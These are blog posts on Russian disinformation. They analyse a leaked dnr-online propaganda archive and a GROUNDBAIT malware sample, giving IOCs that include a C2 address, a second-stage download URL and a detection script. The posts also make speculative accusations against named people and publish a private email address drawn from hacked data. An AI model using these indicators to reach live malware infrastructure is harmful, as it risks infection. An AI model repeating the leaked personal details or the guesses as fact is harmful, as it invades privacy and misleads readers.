The ongoing Senate investigation into collusion and the Russian active measures campaign in 2016 has many people also asking specifically about the targeting data. Did the targeting data come from the Trump organization? Well, yeah, it may well have come from them, or it could have just been collated from online searches and a working knowledge of the electoral system. You see, this attack was simple enough to calculate if you wanted to attempt to win the electoral college. One can Google the states that are key to winning the electoral vote, but it is the fact that the targeting seems to have gone down to actual names and addresses that matters. I for one would be asking Cambridge Analytica about that data and how it may have come into the possession of the Russians. Now it is possible that the Russians had their own parallel program for this, or it is also possible they hacked into Analytica for it, and as far as I am aware, no one has asked for a forensic analysis of CA’s security there. Of course the data could have been handed off by someone like Paul Manafort as a quid pro quo (black caviar), right? Or perhaps it was Jared, as a means of paying off his Russian friends in hopes of a loan to cover his bad real estate debts? I also think it is possible that the hacking of the voter rolls that happened in the same time frame could be the answer to this. It is possible that all those rolls were copied, sifted, and used for targeting of propaganda at the final stage of the race to the White House.

At the end of the day though, the problems of social media, cognitive biases within the populace, and the mob mentality that humans tend to fall into (Republican/Democrat/TeaParty) will not be going away. We are creatures of habit and limited by our own brain biology. Do not expect that knowing that there is a propaganda campaign will stop those willing to receive it from buying into it wholeheartedly. Social media isn’t going away anytime soon, and the idea of algorithms being the key to stopping this is a falsehood. It all really just comes down to how you consume this media and how you react to it. If you fall into the echo chamber of your cognitive bias or bent, then you will likely become a part of that machine and not be able to separate the truths from the biased truths that you personally ascribe to. So when you all ask how this happened, remember that we are the culprits, the people.

K.

Written by Krypt3ia

2017/10/05 at 14:51

RULEAKS: Russian Media and Disinformation in Ukraine by the DNR-ONLINE

INTRODUCTION:

Back in December I located a dump of data on the darknet placed there by a hacker collective in Ukraine called RUH8. The dump is rather good sized and all of it comes from Russian-backed Ukrainian sources. RUH8 dumped one group in particular that I was interested in, because I located a piece of malware in the email spool that, once run through the usual tests, showed itself to be something not widely seen before. I will cover the malware further down the article and will include IOCs, but once I harvested the email spool itself and began to get things translated, things got even more interesting.

Once I mirrored the site I got some help from <REDACTED> and set to work translating emails and document attachments. The bulk of the dump is average emails concerning daily business, but a few began to tell a tale of the company that the emails came from and how it was in fact a Russian front organization created for propaganda in Ukraine and used to manipulate the populace in the Donetsk People’s Republic (the Russian separatist area of Ukraine) and those outside it, including other countries.

Having all of this come to light just after the election win for Trump, and now coming out here in the midst of the Russian intervention and collusion investigations today, I thought this report would be prescient and give a rare insight into how the Russian propaganda machine works, how the intelligence apparatus of Russia works in this respect, and perhaps bring to light a new piece of malware for everyone to see.

THE LEAK:

The leak by RUH8 in the darknet consists of more than a few entities’ email spools, as well as those of individuals that they have described as assets of Russia. In the case of this post the data comes from the domain dnr-online.ru. This is a media org in Ukraine that is Russian backed and, as I said before, caters to the Donetsk People’s Republic. Within the dump there are many documents covering the day to day, but five documents stood out amongst them all (frankly there are more to be analyzed, and one needs Russian speakers to translate them all) as being all things shady.

RUH8 is also the group that hacked and dumped “The Grey Cardinal’s” email spool as well. Having gone through that spool I did not find any malware of merit or anything that was new so I moved on in mirroring and checking for goodies. They keep adding content to the site too so I would expect eventually I will locate some more goodies in the future. Keep an eye on the blog for more when I find it. The Grey Cardinal though is an interesting figure and I recommend you all read up on him as well.

THE PROPAGANDA PLAN:

Right, well on to the good stuff! The following documents found in this dump show Russia’s machinations at propaganda in Ukraine, well, at least this small slice of it.

DOC1

From Translator: This talks about “anti-Russian hysteria” in the media and about disinformation and fake news that makes Russia look bad. And also that pro-Russian voices are accused of being agents of the Kremlin. To counter this, this document outlines a project to create a pro-Kremlin media campaign in the Ukraine that includes a budget for hiring journalists and buying equipment like computers and voice recorders, a budget for freelancers and “insiders”, website hosting, web administrators, editors, and advertising. The amounts — which are, for some reason, in US Dollars — are $9,250 for initial set-up expenses, and $38,280 ongoing costs. Those could be monthly costs; the salary of a full-time journalist is listed at $2,000, and that’s likely to be $2,000 a month. The editor in chief, who’ll be based in Kiev, will get $2,500 a month. Hey, their freelance budget is $6,000 a month!

DOC2

From Translator: This one is a little disturbing, since it outlines how the anti-war movement in the Ukraine can be used for pro-Russian purposes. For example, the idea is to create a picture of the leaders in Kremlin as corrupt power-grabbers who are using the war in eastern Ukraine to distract everyone from their own problems. Russia’s invasion of eastern Ukraine is just misinformation from Kiev. Sounds totally legit.

Oh, and I figured out why it’s all in US Dollars. Hah, this is funny. Way back when I was based in Russia — something like 20 years ago, when the Soviet Union had just collapsed, inflation was rampant. Stores had to change the prices on all their products several times a day! To deal with it, they all switched to using Dollars or Euros instead, the traitors! To fix the problem, instead of fixing the economy, the Russian government outlawed the use of foreign currencies on prices. So what the stores did was switch to using something called the “arbitrary unit” — which just happened to be worth as much as the dollar, by pure coincidence. Ever since then, this “arbitrary unit” has been the default price. It’s particularly convenient during inflationary periods, or when dealing with local currencies in different republics. Plus, everyone knows what it means. So, in this document, they use the term “arbitrary unit” and in others, they seem to have just used the dollar symbol instead.

Also, I can confirm that the ongoing expenses are per month — they spelled that out in this budget.

So anyway, this is another juicy document. They’ve put together a budget for running a fake anti-war grassroots organization.

Initial costs are $79,200 for things like computer equipment, recruiting, registering domain names and getting business and media licenses, and website design. It’s interesting that in both this budget and the previous one I looked at, they’re careful to get all the permits and licenses in place. They might be trying to undermine the government of a foreign country, but at least they’ve got all their paperwork in order!
Then the ongoing expenses are $86,000 and include salaries for regular contributors and freelancers, salaries for editorial managers and copyeditors, a financial manager and their deputy, $2,000 for a lawyer, $20,000 for online advertising, and $10,000 for promotion on social media like Facebook and VKontakte (Russia’s LinkedIn).  

They’re expecting 100,000 unique visitors a day on weekdays.

It’s interesting they note that they’ll be playing games with the tax status of their employees — like in the U.S., there’s a difference between paying people as staff (where the employer has to pay a chunk of the taxes) and as freelancers (where the poor schmuck has to pay for everything). Also, in Ukraine, folks living in the disputed territories don’t have to pay taxes. They’re saying that they can save 40% as a result of playing around with this, which they claim is common practice in the Ukraine.

So not only are they undermining a foreign government, but trying to avoid paying taxes while they do it! I don’t know which is worse.

Document docxk7EDEjG06i is a plan for creating a major national media outlet from scratch. It will take $347,640 in startup costs, and about $146,500 a month in ongoing expenses. Total costs, for an eight-month period, are $3.82 million, including advertising costs, and other related expenses. Again, they’re playing around with the taxes. And they’re expecting to get a quarter million visitors a day on weekdays.

This one also has a budget for protection against DDoS attacks. They estimate that this will cost $2,000 a month (including the site hosting itself).

They also plan to sell advertising here, and have an ad sales department, and the editor in chief’s salary will be $10,000 a month plus a share of the ad revenues.

That’s not too shabby… Then they’ve got some projections for costs and revenues after that first eight-month period, which is interesting for those of our readers who plan to launch an online magazine in the Ukraine…

DOC3

From Translator: This is super evil. I’m really impressed! The idea is to create a pro-European, anti-Russian website — with the underlying message that the Ukraine will be better off without those annoying eastern provinces, and let Russia have them, so that it can enjoy its wonderful European future without them dragging the country down. So, again, they have an editorial budget. $69,900 in setup expenses, $65,000 a month in ongoing expenses, and plans to reach 100,000 readers a day on weekdays.

DOC4

From Translator: This is a plan to create a news site to cover the conflict in the disputed territories, because people are hungry for war news. The idea is to make it seem objective and independent, but slip in a pro-Russian point of view. So they’ll use terms associated with anti-Russian reporting, but slant the coverage to make Ukraine look bad. Yicch. Startup expenses: $97,200, ongoing expenses: $126,500 per month, expected audience: 120,000 unique visitors a day during weekdays.

DOC5

From Translator: This is an analysis of the Ukrainian political system and how a lot of work is done by “shadow” organizations in government. There don’t seem to be any action items here.

DOC6

From translator: This is an overview of the Ukrainian media climate, and on how anti-Russian it is, and blames Western advisers for some of it.

So here is the context from these documents from the translator for you…

From Translator: These emails seem to have been sent to Georgi Bryusov, who heads up Russia’s wrestling federation, and are in reference to a meeting with “PB.” I don’t know who “PB” is.

Bryusov then forwarded them on to Surkov.

So, how likely is this?

Well, I spent some time covering a similar conflict in Georgia, where there was also a “separatist” province, called Abkhazia, and the conflict there was used to put pressure on the Georgian government. Although it was supposed to be a purely local, homegrown movement, Abkhazia — which didn’t even have an airport — somehow had fighter jets and bombed Georgian-controlled areas with them. (I was in one of those areas with a group of UN observers while it was being bombed. Fun! The Georgians shot down one of the planes which … surprise, surprise! … turned out to have a Russian pilot inside.)

Russia also paid the operating costs for the Abkhazian press center, where I spent many a happy day. All international phone calls were free! I could call my editors anywhere in the world, and file stories about the brave Abkhazian rebels! They also fed us and provided us a place to sleep, and organized regular trips to the front lines where we could enjoy being shot at by the Georgians. They also showed us how well prisoners of war were treated and corpses of people killed by the Georgians and, allegedly, mutilated. (Though the Red Cross folks I talked to couldn’t confirm that the mutilations were real and not, say, the expected results of getting too close to an explosion.)

Anyway, the bottom line is that I do have personal experience of Russia spending gold to manipulate the media, in case anyone ever had any doubts that they were willing to do it.

As you can see from the commentary above (and you too can read the documents as well), the Russians set up a media company, including websites, and formulated plans to manipulate people toward the Donetsk People’s Republic and against a Free Ukraine. I am still going through the dump looking for the bills for the domains mentioned as well, and will run them through Threatcrowd and other sources to see if they were used at all for malware C2 and propagation. Which brings me to the use of dnr-online as a C2. Interestingly enough, the site itself is not a C2, but it does have connectivity to other IP addresses and domains that are.

dnr-online.ru

WHOIS for dnr-online.ru

5.101.152.66

The archaeology of malware that talks to 5.101.152.66 is rather interesting. There’s a bit of everything bad attached to that one, to be sure, including that MrSweet address that is ransomware central. 5.101.152.66 is owned/created by beget.ru, which has quite a few dirty connections as well.

beget.ru WHOIS

beget.ru

Of course beget could be innocent enough, but as you can see there is enough of Mos Eisley in there to make one not want to get an account there and set up a site, right? I will continue to look into other domains within the networks that dnr-online bought as soon as I can locate the bills for them or the domain names, and that will be another post I am sure. What all of this tells you, though, is that the Russians have always been carrying out these kinds of active measures against people like those in Ukraine, as well as what they did to us in the election of 2016. This is not a one-time deal and certainly will not be the last one we shall see. In fact, the bots and the domains will continue to be set up by the likes of the SVR and GRU in hopes of manipulating the general populace toward the goals of the Putin regime until its demise.

… and likely past it.

THE MALWARE & GROUNDBAIT:

Right! Now on to the other interesting bit found in the dump from dnr-online. In looking at the spool I dumped all attachments into a folder and began checking them for malware: all the Word docs, Excel sheets, PowerPoints, etc. The docs all checked out, but one zip file had a .scr file in it that turned out to be malware. The file (Центр управления восстановлением ДНР справка-доклад за 13 октября 2015 года.exe, i.e. “Center for Recovery Management of the DNR certificate-report for October 13, 2015.exe”) came in an email from a Russian source to the head of dnr-online. I am unable to source the headers of the email at this time, but the question becomes: was this malware sent to the DNR by RUH8, or was this malware sent to DNR to send to others in some other campaign? I cannot say either way, but the malware is a new sample of GROUNDBAIT, or Prikormka, which was detected and reported on by ESET running rampant in Ukraine. Given that ESET claims that this malware was being used against the separatists in Ukraine, it stands to reason that the malware was to be used by the propaganda campaign against those it was seeking to manipulate. However, the nagging thing for me is the way this was passed around. The email has no real context in the text, and to me it seems to imply that it is a fix for things inside dnr. My other thought is that maybe someone got hold of the GROUNDBAIT raw sample and re-used it by re-packing it and setting it against dnr-online.

An interesting notion…

I contacted ESET and talked a bit with the guy who did the work and he was… well… not so helpful. So here are the IOCs for this file for you all to look for.

IOCs

Filename: Recovery Control Center Help DNR-Report for October 13, 2015
Filetype: .exe
SHA256: f9a96ad58fb946981d196d653ec28fa31d6f946a7e2f6784b317dd9adc557b62 (AV positives: 52/57 scanned on 04/30/2016 07:33:42)
File raw: zip file: zipnh4dZDtMUk.zip

https://www.hybrid-analysis.com/sample/4eaf154ce8974228db6e35a1364337a12b821b73f052a44dc24ebdf0c1da6a4e?environmentId=100
https://virustotal.com/en/file/4eaf154ce8974228db6e35a1364337a12b821b73f052a44dc24ebdf0c1da6a4e/analysis/1484661011/

Dropped executables:
“archive.rar” has type “gzip compressed data from NTFS filesystem (NT)”
“helpldr.dll” has type “PE32 executable (DLL) (GUI) Intel 80386 for MS Windows”
“samlib.dll” has type “PE32 executable (DLL) (GUI) Intel 80386 for MS Windows”
“rbcon.ini” has type “ASCII text with CRLF line terminators”

Writes directory archive.rar (exfil)

C2 connected: 185.68.16.35
Connects and downloads second stage: GET http://wallejob.in.ua/wd.php?sn=2120161230091201&rb=7&ob=R_pol_x&bt=0 HTTP/1.1

https://www.threatcrowd.org/ip.php?ip=185.68.16.35
https://www.threatcrowd.org/malware.php?md5=7accb6fed266a2023659f438ad1b3546
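As an added illustration (not part of the original post or of ESET’s work), here is a small Python IOC matcher built from the indicators listed above: it flags proxy-log requests to the C2 host or with the wd.php second-stage URI shape, checks file hashes against the two SHA256 values, and matches the dropped-file names. The proxy-log format and the sample log lines are constructed for this example.

```python
"""Minimal IOC matcher for the GROUNDBAIT/Prikormka sample described in the post."""
import hashlib
import re
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the post's IOC list (sample hashes, C2, dropped files).
IOC_SHA256 = {
    "f9a96ad58fb946981d196d653ec28fa31d6f946a7e2f6784b317dd9adc557b62",
    "4eaf154ce8974228db6e35a1364337a12b821b73f052a44dc24ebdf0c1da6a4e",
}
IOC_C2_HOSTS = {"185.68.16.35", "wallejob.in.ua"}
IOC_DROPPED_FILES = {"helpldr.dll", "samlib.dll", "rbcon.ini", "archive.rar"}

# Shape of the observed second-stage download: /wd.php?sn=...&rb=...&ob=...&bt=...
BEACON_PATH = "/wd.php"
BEACON_PARAMS = ("sn", "rb", "ob", "bt")

# Constructed proxy-log format (an assumption, not from the post):
# "<timestamp> <client-ip> <METHOD> <url> <status>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def sha256_hex(data: bytes) -> str:
    """Hash a file's bytes so it can be compared with the SHA256 IOCs."""
    return hashlib.sha256(data).hexdigest()


def hash_matches(digest: str) -> bool:
    """True if a SHA256 hex digest (any case) is one of the known sample hashes."""
    return digest.strip().lower() in IOC_SHA256


def parse_beacon(url: str):
    """Return the beacon parameters if the URL has the wd.php second-stage shape, else None.

    All four parameters must be present; a bare /wd.php?sn=1 is not treated as a hit.
    """
    parts = urlsplit(url)
    if parts.path != BEACON_PATH:
        return None
    qs = parse_qs(parts.query)
    if not all(p in qs for p in BEACON_PARAMS):
        return None
    return {p: qs[p][0] for p in BEACON_PARAMS}


def classify_request(url: str) -> list:
    """Tag a request as hitting the C2 host, the beacon URI shape, or both."""
    host = (urlsplit(url).hostname or "").lower()
    tags = []
    if host in IOC_C2_HOSTS:
        tags.append("c2-host")
    if parse_beacon(url) is not None:
        tags.append("beacon-uri")
    return tags


def scan_proxy_log(lines):
    """Return (client, url, tags) for each log line that matches at least one IOC."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines instead of aborting the whole scan
        tags = classify_request(m.group("url"))
        if tags:
            hits.append((m.group("client"), m.group("url"), tags))
    return hits


def dropped_file_hits(names):
    """File names (e.g. from sandbox or EDR file-write telemetry) matching the dropped-file IOCs."""
    return sorted(n for n in names if n.lower() in IOC_DROPPED_FILES)


# Constructed sample log: a benign request, the second-stage fetch to the C2 domain,
# a bare hit on the C2 IP, a look-alike /wd.php that lacks the full parameter set, and junk.
SAMPLE_LOG = """\
2017-03-28T12:00:01Z 10.0.0.15 GET http://example.org/index.html 200
2017-03-28T12:00:02Z 10.0.0.15 GET http://wallejob.in.ua/wd.php?sn=2120161230091201&rb=7&ob=R_pol_x&bt=0 200
2017-03-28T12:00:03Z 10.0.0.22 GET http://185.68.16.35/ 404
2017-03-28T12:00:04Z 10.0.0.31 GET http://example.net/wd.php?sn=1 200
this line is garbage
"""

if __name__ == "__main__":
    for client, url, tags in scan_proxy_log(SAMPLE_LOG.splitlines()):
        print(f"{client} -> {url} [{', '.join(tags)}]")
    print(dropped_file_hits(["HELPLDR.DLL", "notes.txt", "rbcon.ini"]))
```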

 

TYING IT ALL TOGETHER:

So what we have here is the insider’s view of how dnr-online, a propaganda wing within Ukraine’s Donetsk People’s Republic, put together media services and planned to use them as a framework for Russian propaganda in the region. We also have malware that is known to be actual spycraft in the region within its mail spool, being passed around to at least two sources inside, one of them being the director of the DNR company. Was that malware meant to infect and eventually allow for the dump in the darknet, or was the malware being passed along for other uses that we cannot see in this spool dump? In either case this information makes it clear that in Ukraine the Russian propaganda and espionage machines are alive and well and using the net as a force multiplier at the very least.

I will continue looking at the growing dumps by RUH8 and let you all know about any malware and goodies that pop up. It is also of interest to you all that this dump has been around and certain groups have looked at it and just sort of said “Nothing to see here”, which is interesting to me. I mean, malware that no one has really seen and plans for propaganda in the region are of no interest? I guess maybe these groups just did not want to spend the cycles on looking deeper into the data. I actually did, with the help of others, and also checked the forensics on the metadata to ensure the stuff was real.

…but that’s just me… I am not a churnalist.

Oh well..

More when I have it.

K.

UPDATE!: One day after this report one IP address involved as a nexus of malware has changed its domain name! Coincidence? Hmmmm?

Screenshot from 2017-03-29 06-14-33

Written by Krypt3ia

2017/03/28 at 13:00

About That Manafort Leak…

Paul Manafort, campaign worker for Donald Trump, president and chief executive of Trump Organization Inc. and 2016 Republican presidential candidate, not pictured, speaks with the press during an election night event in New York, U.S., on Tuesday, April 19, 2016. Trump, the billionaire real-estate mogul, got a major boost in his quest to secure the Republican nomination with a majority of delegates but could not eliminate the possibility of a contested convention. Photographer: Victor J. Blue/Bloomberg via Getty Images

So yeah, I posted a story last week about how a dump of data in the darknet seemed to be in fact Paul Manafort’s daughter’s iPhone. It seems that this story was just too good to lose for Politico, and the unscrupulous reporter there lifted not only my story but also my images! (Yes, the hashes match; he just saved them locally and re-named them.) Politico has done nothing to remedy this and they are churnalists of the worst kind, but they did at least call some people in the Manafort court to see if they would admit to the hack, and they did. I could have told them that the hack was real because there was more that I did not post on the blog last time. The fact of the matter is that in the dump there was also a SQL database that I got hold of, and in that dump there’s one little interesting factoid. Paul Manafort has an email address that seems to be on a personal domain that isn’t really known about. In the dump connecting with his daughter is a personal iPhone for Paul, and in that connection via text is his email address (pmanafort@dmpint.com). When you look up this domain you can see it is one of a few that belong to the Manafort family but registered by another party, one Todd Hankins. Now it seems to me that in an era of “BUT HER EMAILS” this factoid might be of interest to, say, I dunno, the IC: that he has this and his email is being sent to and from this cutout domain.

screenshot-from-2017-02-27-09-14-29

screenshot-from-2017-02-27-09-13-52

Now the domain has never had a site on it, and as far as I can see with the limited looking I have done, this domain has been kept kinda on the downlow, as the Manafort name is not on it like the others. The ONLY thing connecting it to Paul now is the email address and the fact that Todd there set it up for him in 2010. I personally find that interesting… You? I have passed this little tidbit to the right people, but now I am going to go wide with it… One wonders as to what emails might lie within that pesky little email system at dmpint.com.

screenshot-from-2017-02-27-09-22-44

screenshot-from-2017-02-27-09-22-04

Let the FISA WARRANTS FLY!

K.

PS!!!

Google that domain and see what you get… It comes up all Ukraine travel sites… What does Google know hmmmmm?

Written by Krypt3ia

2017/02/27 at 14:23

Posted in Games, OSINT, Russia, Tradecraft